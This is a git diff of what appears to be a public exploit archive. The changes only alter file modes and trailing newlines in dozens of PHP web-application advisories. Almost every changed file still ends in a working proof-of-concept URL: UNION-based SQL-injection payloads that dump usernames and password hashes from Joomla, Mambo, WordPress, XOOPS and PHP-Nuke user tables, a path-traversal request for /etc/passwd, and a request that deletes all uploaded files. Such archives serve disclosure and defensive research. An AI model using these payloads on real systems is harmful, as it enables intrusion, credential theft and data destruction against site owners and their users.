-http://www.example.com/?page_id=xxxx&forum=S@BUN&topic=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,0,0,0,0,0/**/from%2F%2A%2A%2Fwp_users/**where%20id%201%20=%20-1 \ No newline at end of file +http://www.example.com/?page_id=xxxx&forum=S@BUN&topic=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,0,0,0,0,0/**/from%2F%2A%2A%2Fwp_users/**where%20id%201%20=%20-1 \ No newline at end of file diff --git a/platforms/php/webapps/31213.txt b/platforms/php/webapps/31213.txt old mode 100755 new mode 100644 index 0de2c166f..3d4945efd --- a/platforms/php/webapps/31213.txt +++ b/platforms/php/webapps/31213.txt @@ -5,4 +5,4 @@ The Joomla! and Mambo 'com_salesrep' component is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_salesrep&action=showrep&Itemid=S@BUN&rid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a, -0x3a/**/from/**/jos_users/* \ No newline at end of file +0x3a/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31214.txt b/platforms/php/webapps/31214.txt old mode 100755 new mode 100644 index a7ef01b11..0e1ce1999 --- a/platforms/php/webapps/31214.txt +++ b/platforms/php/webapps/31214.txt @@ -5,4 +5,4 @@ The Joomla! and Mambo 'com_lexikon' component is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_lexikon&id=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_u -sers/* \ No newline at end of file +sers/* \ No newline at end of file diff --git a/platforms/php/webapps/31215.txt b/platforms/php/webapps/31215.txt old mode 100755 new mode 100644 index 198957c54..dd8a2a840 --- a/platforms/php/webapps/31215.txt +++ b/platforms/php/webapps/31215.txt @@ -5,4 +5,4 @@ The Joomla! and Mambo 'com_filebase' component is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_filebase&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(u -sername,0x3a,password)/**/from/**/mos_users/* \ No newline at end of file +sername,0x3a,password)/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31216.txt b/platforms/php/webapps/31216.txt old mode 100755 new mode 100644 index 098623d6b..12f2e9b64 --- a/platforms/php/webapps/31216.txt +++ b/platforms/php/webapps/31216.txt @@ -5,4 +5,4 @@ The Joomla! and Mambo 'com_scheduling' component is prone to an SQL-injection vu Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_scheduling&Itemid=28&action=viewAbstract&id=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),concat(username,0x3a,password),4,5, -6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/from/**/mos_users/* \ No newline at end of file +6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31217.txt b/platforms/php/webapps/31217.txt old mode 100755 new mode 100644 index 11cc46906..701e544f6 --- a/platforms/php/webapps/31217.txt +++ b/platforms/php/webapps/31217.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to This issue affects BanPro DMS 1.0; other versions may also be vulnerable. -http://www.example.com/DMS/index.php?action=../../../../../../../../../../etc/passwd%00 \ No newline at end of file +http://www.example.com/DMS/index.php?action=../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/31224.txt b/platforms/php/webapps/31224.txt old mode 100755 new mode 100644 index 483c77d40..098648d2f --- a/platforms/php/webapps/31224.txt +++ b/platforms/php/webapps/31224.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_profile' component is prone to an SQL-injection vulne Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_profile&Itemid=s@bun&task=&task=viewoffer&oid=9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_profile&Itemid=s@bun&task=&task=viewoffer&oid=9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31225.html b/platforms/php/webapps/31225.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31226.txt b/platforms/php/webapps/31226.txt old mode 100755 new mode 100644 index bfcb77559..f6c2a6245 --- a/platforms/php/webapps/31226.txt +++ b/platforms/php/webapps/31226.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_detail' component is prone to an SQL-injection vulner Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_detail&Itemid=s@bun&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A \ No newline at end of file +http://www.example.com/index.php?option=com_detail&Itemid=s@bun&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A \ No newline at end of file diff --git a/platforms/php/webapps/31227.txt b/platforms/php/webapps/31227.txt old mode 100755 new mode 100644 index b68875668..5d5d69a38 --- a/platforms/php/webapps/31227.txt +++ b/platforms/php/webapps/31227.txt @@ -4,4 +4,4 @@ Simple Forum is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users \ No newline at end of file +http://www.example.com/wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users \ No newline at end of file diff --git a/platforms/php/webapps/31228.txt b/platforms/php/webapps/31228.txt old mode 100755 new mode 100644 index 8d0ddcb69..04df5b4d8 --- a/platforms/php/webapps/31228.txt +++ b/platforms/php/webapps/31228.txt @@ -4,4 +4,4 @@ The WordPress Recipes Blog plugin is prone to an SQL-injection vulnerability bec Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/wp-content/plugins/recipe/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users \ No newline at end of file +http://www.example.com/wp-content/plugins/recipe/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users \ No newline at end of file diff --git a/platforms/php/webapps/31229.txt b/platforms/php/webapps/31229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3123.htm b/platforms/php/webapps/3123.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31230.txt b/platforms/php/webapps/31230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31235.txt b/platforms/php/webapps/31235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31236.txt b/platforms/php/webapps/31236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31237.txt b/platforms/php/webapps/31237.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31238.txt b/platforms/php/webapps/31238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31239.txt b/platforms/php/webapps/31239.txt old mode 100755 new mode 100644 index 166bed94f..a81719956 --- a/platforms/php/webapps/31239.txt +++ b/platforms/php/webapps/31239.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to delete all files that have been uploaded to File Upload Manager 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/index.php?act=delall \ No newline at end of file +http://www.example.com/[path]/index.php?act=delall \ No newline at end of file diff --git a/platforms/php/webapps/3124.php b/platforms/php/webapps/3124.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31240.txt b/platforms/php/webapps/31240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31241.txt b/platforms/php/webapps/31241.txt old mode 100755 new mode 100644 index 98c748090..5180d93c1 --- a/platforms/php/webapps/31241.txt +++ b/platforms/php/webapps/31241.txt @@ -4,4 +4,4 @@ The PHP-Nuke Sections module is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/xxxxSections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2 \ No newline at end of file +http://www.example.com/xxxxSections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2 \ No newline at end of file diff --git a/platforms/php/webapps/31242.txt b/platforms/php/webapps/31242.txt old mode 100755 new mode 100644 index 11cd667cf..4077c56f5 --- a/platforms/php/webapps/31242.txt +++ b/platforms/php/webapps/31242.txt @@ -4,4 +4,4 @@ Facile Forms is prone to an SQL-injection vulnerability because it fails to suff Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31243.txt b/platforms/php/webapps/31243.txt old mode 100755 new mode 100644 index e61a122e7..e27c4c348 --- a/platforms/php/webapps/31243.txt +++ b/platforms/php/webapps/31243.txt @@ -4,4 +4,4 @@ The 'com_team' component for Joomla! and Mambo is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31244.txt b/platforms/php/webapps/31244.txt old mode 100755 new mode 100644 index d63951cb5..7ef170cfe --- a/platforms/php/webapps/31244.txt +++ b/platforms/php/webapps/31244.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_iigcatalog' component is prone to an SQL-injection vu Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31245.txt b/platforms/php/webapps/31245.txt old mode 100755 new mode 100644 index c6cc8c8f7..5f9d9f63a --- a/platforms/php/webapps/31245.txt +++ b/platforms/php/webapps/31245.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_formtool' component is prone to an SQL-injection vuln Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31246.txt b/platforms/php/webapps/31246.txt old mode 100755 new mode 100644 index 9c51f42b7..7e2e22cf1 --- a/platforms/php/webapps/31246.txt +++ b/platforms/php/webapps/31246.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_genealogy' component is prone to an SQL-injection vul Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31247.txt b/platforms/php/webapps/31247.txt old mode 100755 new mode 100644 index 3d2fececa..89d9f284c --- a/platforms/php/webapps/31247.txt +++ b/platforms/php/webapps/31247.txt @@ -4,4 +4,4 @@ iJoomla 'com_magazine' component is prone to an SQL-injection vulnerability beca Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/** \ No newline at end of file +http://www.example.com/index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/** \ No newline at end of file diff --git a/platforms/php/webapps/31248.txt b/platforms/php/webapps/31248.txt old mode 100755 new mode 100644 index d938f7ea1..8de9ab682 --- a/platforms/php/webapps/31248.txt +++ b/platforms/php/webapps/31248.txt @@ -4,4 +4,4 @@ XOOPS 'vacatures' module is prone to an SQL-injection vulnerability because it f Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules/vacatures/index.php?pa=view&cid=-00000/**/union/**/select/**/0000,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111 \ No newline at end of file +http://www.example.com/modules/vacatures/index.php?pa=view&cid=-00000/**/union/**/select/**/0000,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111 \ No newline at end of file diff --git a/platforms/php/webapps/31249.txt b/platforms/php/webapps/31249.txt old mode 100755 new mode 100644 index 453ebfeb8..7e374e4e8 --- a/platforms/php/webapps/31249.txt +++ b/platforms/php/webapps/31249.txt @@ -4,4 +4,4 @@ The XOOPS 'events' module is prone to an SQL-injection vulnerability because it Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules/events/index.php?op=show&id=-6666+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111 \ No newline at end of file +http://www.example.com/modules/events/index.php?op=show&id=-6666+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111 \ No newline at end of file diff --git a/platforms/php/webapps/3125.c b/platforms/php/webapps/3125.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31250.txt b/platforms/php/webapps/31250.txt old mode 100755 new mode 100644 index 495a960eb..4a48a4421 --- a/platforms/php/webapps/31250.txt +++ b/platforms/php/webapps/31250.txt @@ -4,4 +4,4 @@ The XOOPS 'seminars' module is prone to an SQL-injection vulnerability because i Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules/seminars/index.php?op=show&id=-77777/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin \ No newline at end of file +http://www.example.com/modules/seminars/index.php?op=show&id=-77777/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin \ No newline at end of file diff --git a/platforms/php/webapps/31251.txt b/platforms/php/webapps/31251.txt old mode 100755 new mode 100644 index b3613417e..c13dd2183 --- a/platforms/php/webapps/31251.txt +++ b/platforms/php/webapps/31251.txt @@ -4,4 +4,4 @@ The XOOPS 'badliege' module is prone to an SQL-injection vulnerability because i Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules/badliege/index.php?op=show&id=-9999999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5 \ No newline at end of file +http://www.example.com/modules/badliege/index.php?op=show&id=-9999999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5 \ No newline at end of file diff --git a/platforms/php/webapps/31252.txt b/platforms/php/webapps/31252.txt old mode 100755 new mode 100644 index 1e25e3f62..44e0de921 --- a/platforms/php/webapps/31252.txt +++ b/platforms/php/webapps/31252.txt @@ -4,4 +4,4 @@ The PHP-Nuke Web_Links module is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202 \ No newline at end of file +http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202 \ No newline at end of file diff --git a/platforms/php/webapps/31256.txt b/platforms/php/webapps/31256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31262.txt b/platforms/php/webapps/31262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31263.txt b/platforms/php/webapps/31263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31265.txt b/platforms/php/webapps/31265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31266.txt b/platforms/php/webapps/31266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31267.txt b/platforms/php/webapps/31267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31268.txt b/platforms/php/webapps/31268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31269.txt b/platforms/php/webapps/31269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31270.txt b/platforms/php/webapps/31270.txt old mode 100755 new mode 100644 index 6c968731f..b86f74c5e --- a/platforms/php/webapps/31270.txt +++ b/platforms/php/webapps/31270.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br The issues affect Spyce 2.1.3; other versions may also be vulnerable. Requesting the following URL returns the server's webroot: -http://www.example.com/spyce/examples/automaton.spy \ No newline at end of file +http://www.example.com/spyce/examples/automaton.spy \ No newline at end of file diff --git a/platforms/php/webapps/31272.txt b/platforms/php/webapps/31272.txt old mode 100755 new mode 100644 index 38b8b4297..ae0d82dc1 --- a/platforms/php/webapps/31272.txt +++ b/platforms/php/webapps/31272.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_joomlavvz' component is prone to an SQL-injection vul Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31273.txt b/platforms/php/webapps/31273.txt old mode 100755 new mode 100644 index 2fb11313f..3cfaec2d7 --- a/platforms/php/webapps/31273.txt +++ b/platforms/php/webapps/31273.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_most' component is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_most&mode=email&secid=-9999999/**/union/**/select/**/0000,concat(username,0x3a,password),2222,3333/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31274.txt b/platforms/php/webapps/31274.txt old mode 100755 new mode 100644 index 6559689f6..7204fa1e7 --- a/platforms/php/webapps/31274.txt +++ b/platforms/php/webapps/31274.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_asortyment' component is prone to an SQL-injection vu Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999/**/union/**/select/**/0x3a,concat(username,0x3a,password),concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_asortyment&Itemid=36&lang=pl&task=kat&katid=-9999999/**/union/**/select/**/0x3a,concat(username,0x3a,password),concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31277.txt b/platforms/php/webapps/31277.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31278.txt b/platforms/php/webapps/31278.txt old mode 100755 new mode 100644 index a7bff689c..e747f34b2 --- a/platforms/php/webapps/31278.txt +++ b/platforms/php/webapps/31278.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica These issues affect Aeries Student Information System 3.8.2.8 and 3.7.2.2; other versions may also be affected. -http://www.example.com/GradebookStuScores.asp?GrdBk=SQL \ No newline at end of file +http://www.example.com/GradebookStuScores.asp?GrdBk=SQL \ No newline at end of file diff --git a/platforms/php/webapps/31280.txt b/platforms/php/webapps/31280.txt old mode 100755 new mode 100644 index ef84b97ff..7a3073eb8 --- a/platforms/php/webapps/31280.txt +++ b/platforms/php/webapps/31280.txt @@ -5,4 +5,4 @@ The Joomla! and Mambo Referenzen component is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(user -name,0x3a,password),0,0,0,0,0/**/from/**/jos_users/* \ No newline at end of file +name,0x3a,password),0,0,0,0,0/**/from/**/jos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31281.txt b/platforms/php/webapps/31281.txt old mode 100755 new mode 100644 index aa68f4d54..e3bb906dc --- a/platforms/php/webapps/31281.txt +++ b/platforms/php/webapps/31281.txt @@ -4,4 +4,4 @@ The Classifieds module for PHP-Nuke is prone to an SQL-injection vulnerability b Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules.php?name=Classifieds&mode=Details&id=-0000/**/union+select/**/000,111,222,000,aid,5,6,pwd,8,9,10,11/**/from/**/nuke_authors/*where%20admin%202%20-4 \ No newline at end of file +http://www.example.com/modules.php?name=Classifieds&mode=Details&id=-0000/**/union+select/**/000,111,222,000,aid,5,6,pwd,8,9,10,11/**/from/**/nuke_authors/*where%20admin%202%20-4 \ No newline at end of file diff --git a/platforms/php/webapps/31282.txt b/platforms/php/webapps/31282.txt old mode 100755 new mode 100644 index ff7a8d1d3..5b49864b4 --- a/platforms/php/webapps/31282.txt +++ b/platforms/php/webapps/31282.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects Tiny Event 1.01; other versions may also be vulnerable. -http://www.example.com/modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066 \ No newline at end of file +http://www.example.com/modules/tinyevent/index.php?op=print&id=-0/**/union/**/select+0x3a,0x3a,0x3a,uname,pass+from/**/xoops_users/*where%20admin%201%200%2066 \ No newline at end of file diff --git a/platforms/php/webapps/31283.txt b/platforms/php/webapps/31283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31284.txt b/platforms/php/webapps/31284.txt old mode 100755 new mode 100644 index 4b7a1886f..cb4cad237 --- a/platforms/php/webapps/31284.txt +++ b/platforms/php/webapps/31284.txt @@ -4,4 +4,4 @@ XOOPS 'prayerlist' module is prone to an SQL-injection vulnerability because it Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/modules/prayerlist/index.php?pa=view&cid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass)/**/from/**/xoops_users/* \ No newline at end of file +http://www.example.com/modules/prayerlist/index.php?pa=view&cid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass)/**/from/**/xoops_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31287.txt b/platforms/php/webapps/31287.txt old mode 100755 new mode 100644 index eaa66e618..db428add0 --- a/platforms/php/webapps/31287.txt +++ b/platforms/php/webapps/31287.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Recipe 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/* \ No newline at end of file +http://www.example.com/modules.php?name=Recipe&recipeid=-000/**/union+select+0,pwd,0,0x3a,0x3a,0,aid,aid,pwd,0,0,0,0,0x3a,0,0/**/from/**/nuke_authors/* \ No newline at end of file diff --git a/platforms/php/webapps/31288.txt b/platforms/php/webapps/31288.txt old mode 100755 new mode 100644 index c63ee2c8b..5500bebbc --- a/platforms/php/webapps/31288.txt +++ b/platforms/php/webapps/31288.txt @@ -4,4 +4,4 @@ The Joomla! and Mambo 'com_hello_world' component is prone to an SQL-injection v Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/mos_users/* \ No newline at end of file +http://www.example.com/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999/**/union/**/select/**/0x3a,username,password,0x3a/**/from/**/mos_users/* \ No newline at end of file diff --git a/platforms/php/webapps/31289.txt b/platforms/php/webapps/31289.txt old mode 100755 new mode 100644 index d1ad37170..0cb66457b --- a/platforms/php/webapps/31289.txt +++ b/platforms/php/webapps/31289.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Gallery 1.3 is vulnerable; other versions may also be affected. -http://www.example.com/modules.php?name=Sections&sop=printpage&artid=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** \ No newline at end of file +http://www.example.com/modules.php?name=Sections&sop=printpage&artid=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/** \ No newline at end of file diff --git a/platforms/php/webapps/31290.txt b/platforms/php/webapps/31290.txt old mode 100755 new mode 100644 index 24172c00c..f3daa024c --- a/platforms/php/webapps/31290.txt +++ b/platforms/php/webapps/31290.txt @@ -4,4 +4,4 @@ auraCMS is prone to an SQL-injection vulnerability because it fails to sufficien Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?pilih=lihatberita&id=-9999999/**/union/**/select/**/0,1,password,3,4,user,6/**/from/**/user/*where%20admin1/** \ No 